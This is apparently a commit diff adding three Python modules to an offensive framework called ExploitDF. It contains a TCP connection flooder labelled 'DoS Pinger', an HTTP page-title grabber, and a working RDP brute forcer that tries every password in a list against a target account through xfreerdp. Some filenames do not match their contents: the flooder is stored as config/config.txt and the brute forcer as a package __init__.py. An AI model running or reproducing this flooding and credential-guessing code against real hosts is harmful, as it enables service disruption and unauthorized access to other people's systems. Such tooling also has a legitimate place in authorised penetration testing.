Add files via upload

Author: defronixpro

config/config.txt

@@ -0,0 +1,74 @@
+#!/usr/bin/env python3
+"""
+DoS Pinger (AuxiliaryModule)
+Sends rapid TCP connections and payloads to target to stress test service.
+"""
+
+import socket
+import time
+from BaseModule import AuxiliaryModule
+
+
+class DoSPinger(AuxiliaryModule):
+    def __init__(self):
+        super().__init__()
+        self.info.update({
+            'name': 'DoS Pinger',
+            'description': 'Flood target with TCP packets for stress testing',
+            'author': 'Danii',
+            'version': '1.0'
+        })
+
+        self.options.update({
+            'RHOSTS': '',
+            'RPORT': 80,
+            'PACKET_SIZE': 1024,
+            'COUNT': 100,
+            'DELAY': 0.01,  # seconds between packets
+            'TIMEOUT': 1
+        })
+
+        self.required_options.add('RHOSTS')
+
+    def scan_target(self, target):
+        port = int(self.get_option('RPORT'))
+        count = int(self.get_option('COUNT'))
+        size = int(self.get_option('PACKET_SIZE'))
+        delay = float(self.get_option('DELAY'))
+        self.print_status(f"Starting DoS ping flood to {target}:{port} ({count} packets)")
+
+        for i in range(1, count + 1):
+            if not self.running:
+                break
+            try:
+                sock = socket.create_connection((target, port), timeout=int(self.get_option('TIMEOUT')))
+                sock.send(b"A" * size)
+                sock.close()
+                self.print_good(f"Sent packet {i}/{count}")
+                time.sleep(delay)
+            except Exception as e:
+                self.print_error(f"Stopped on packet {i}: {e}")
+                break
+
+    def run(self):
+        if super().run() == False:
+            return False
+
+        targets = [t.strip() for t in str(self.get_option('RHOSTS')).split(",") if t.strip()]
+        for i, target in enumerate(targets, start=1):
+            if not self.running:
+                break
+            self.progress_update(i, len(targets), f"Flooding {target}")
+            self.scan_target(target)
+
+        self.print_good("DoS ping completed")
+        self.cleanup()
+        return True
+
+
+if __name__ == "__main__":
+    m = DoSPinger()
+    m.set_option('RHOSTS', '192.168.56.101')
+    m.set_option('RPORT', 80)
+    m.set_option('COUNT', 50)
+    m.run()

modules/__init__.py

@@ -0,0 +1,77 @@
+# """
+# Sample HTTP Title Grabber Module for ExploitDF Framework  
+# """
+import sys
+from pathlib import Path
+
+# Add the project's root directory to the Python path
+project_root = Path(__file__).resolve().parent.parent.parent
+sys.path.append(str(project_root))
+
+from BaseModule import AuxiliaryModule
+import socket
+import re
+
+
+class HttpTitleModule(AuxiliaryModule):
+    def __init__(self):
+        super().__init__()
+        
+        self.info.update({
+            'name': 'HTTP Title Grabber',
+            'description': 'Grab HTTP page titles from web servers',
+            'author': 'Abhay Pratap Singh',
+            'version': '1.0',
+            'type': 'auxiliary'
+        })
+        
+        self.options.update({
+            'RPORT': 80,
+            'SSL': False,
+            'URI': '/',
+            'UserAgent': 'Mozilla/5.0 (ExploitDF)'
+        })
+    
+    def run(self):
+        """Main execution method"""
+        if super().run() == False:
+            return False
+        
+        targets_string = self.get_option('RHOSTS')
+        targets = targets_string.split(',') if targets_string else []
+        
+        for target in targets:
+            target = target.strip()
+            if target:
+                self.grab_title(target)
+        
+        return True
+    
+    def grab_title(self, target):
+        """Grab the title from a web server"""
+        try:
+            port = self.get_option('RPORT')
+            uri = self.get_option('URI')
+            user_agent = self.get_option('UserAgent')
+            
+            sock = self.create_socket(target, port)
+            if not sock:
+                return
+            
+            # Send HTTP request
+            request = f"""GET {uri} HTTP/1.1\r\nHost: {target}\r\nUser-Agent: {user_agent}\r\nConnection: close\r\n\r\n"""
+            
+            sock.send(request.encode())
+            response = sock.recv(4096).decode('utf-8', errors='ignore')
+            sock.close()
+            
+            # Extract title
+            title_match = re.search(r'<title>(.*?)</title>', response, re.IGNORECASE | re.DOTALL)
+            if title_match:
+                title = title_match.group(1).strip()
+                self.print_good(f"{target}:{port} - Title: {title}")
+            else:
+                self.print_status(f"{target}:{port} - No title found")
+                
+        except Exception as e:
+            self.print_error(f"Error connecting to {target}: {e}")

modules/auxiliary/__init__.py

@@ -0,0 +1,123 @@
+#!/usr/bin/env python3
+"""
+RDP Brute Forcer (xfreerdp only)
+Attempts RDP authentication against target(s) using xfreerdp in auth-only mode.
+Works on Windows (with xfreerdp.exe installed and in PATH) and Linux.
+"""
+
+import os
+import subprocess
+import time
+from BaseModule import AuxiliaryModule
+
+
+class RDPBruteForcer(AuxiliaryModule):
+    def __init__(self):
+        super().__init__()
+        self.info.update({
+            'name': 'RDP Brute Forcer',
+            'description': 'Attempts RDP authentication using xfreerdp and a username/password list',
+            'author': 'Danii',
+            'version': '2.0'
+        })
+
+        self.options.update({
+            'RHOSTS': '',            # comma separated hosts
+            'RPORT': 3389,
+            'USERNAME': 'Administrator',
+            'PASSLIST': 'passwords.txt',  # one password per line
+            'TIMEOUT': 10,
+            'DELAY': 0.5,            # seconds between attempts
+            'STOP_ON_SUCCESS': True
+        })
+
+        self.required_options.update({'RHOSTS', 'USERNAME', 'PASSLIST'})
+
+    def try_login(self, target, username, password):
+        """Try single username/password pair using xfreerdp."""
+        port = int(self.get_option('RPORT') or 3389)
+        timeout = int(self.get_option('TIMEOUT') or 10)
+        hostport = f"{target}:{port}" if port != 3389 else target
+
+        cmd = [
+            "xfreerdp", "--auth-only", f"/u:{username}", f"/p:{password}",
+            f"/v:{hostport}", "--ignore-certificate"
+        ]
+
+        try:
+            p = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
+            out = (p.stdout or "") + (p.stderr or "")
+            self.vprint(f"[xfreerdp] rc={p.returncode} output:\n{out}")
+
+            if p.returncode == 0 and "Authentication only" in out:
+                return True, out  # success
+            return False, out  # failure
+        except FileNotFoundError:
+            return False, "xfreerdp.exe not found (add it to PATH)"
+        except subprocess.TimeoutExpired:
+            return False, "xfreerdp timed out"
+
+    def scan_target(self, target):
+        username = str(self.get_option('USERNAME') or '')
+        passfile = str(self.get_option('PASSLIST') or '')
+        delay = float(self.get_option('DELAY') or 0.5)
+        stop_on_success = bool(self.get_option('STOP_ON_SUCCESS') in (True, 'True', 'true', '1', 1))
+
+        if not os.path.exists(passfile):
+            self.print_error(f"Password list not found: {passfile}")
+            return
+
+        try:
+            with open(passfile, 'r', encoding='utf-8', errors='ignore') as fh:
+                passwords = [line.strip() for line in fh if line.strip()]
+        except Exception as e:
+            self.print_error(f"Could not read {passfile}: {e}")
+            return
+
+        if not passwords:
+            self.print_error("Password list empty.")
+            return
+
+        total = len(passwords)
+        self.print_status(f"Attempting {total} passwords against {target} for user '{username}'")
+
+        for idx, pwd in enumerate(passwords, start=1):
+            if not self.running:
+                break
+            self.progress_update(idx, total, f"trying {idx}/{total}")
+            ok, output = self.try_login(target, username, pwd)
+            if ok:
+                self.print_good(f"VALID: {username}:{pwd} on {target}")
+                if stop_on_success:
+                    return
+            else:
+                self.vprint(f"Failed: {username}:{pwd} - {output}")
+            time.sleep(delay)
+
+    def run(self):
+        if super().run() == False:
+            return False
+
+        hosts = [h.strip() for h in str(self.get_option('RHOSTS')).split(",") if h.strip()]
+        if not hosts:
+            self.print_error("RHOSTS not set or no valid targets.")
+            return False
+
+        for i, host in enumerate(hosts, start=1):
+            if not self.running:
+                break
+            self.progress_update(i, len(hosts), f"Brute forcing RDP on {host}")
+            self.scan_target(host)
+
+        self.print_good("RDP brute forcing finished")
+        self.cleanup()
+        return True
+
+
+if __name__ == "__main__":
+    # Standalone test mode
+    m = RDPBruteForcer()
+    m.set_option('RHOSTS', '127.0.0.1')
+    m.set_option('USERNAME', 'Administrator')
+    m.set_option('PASSLIST', 'passwords.txt')
+    m.run()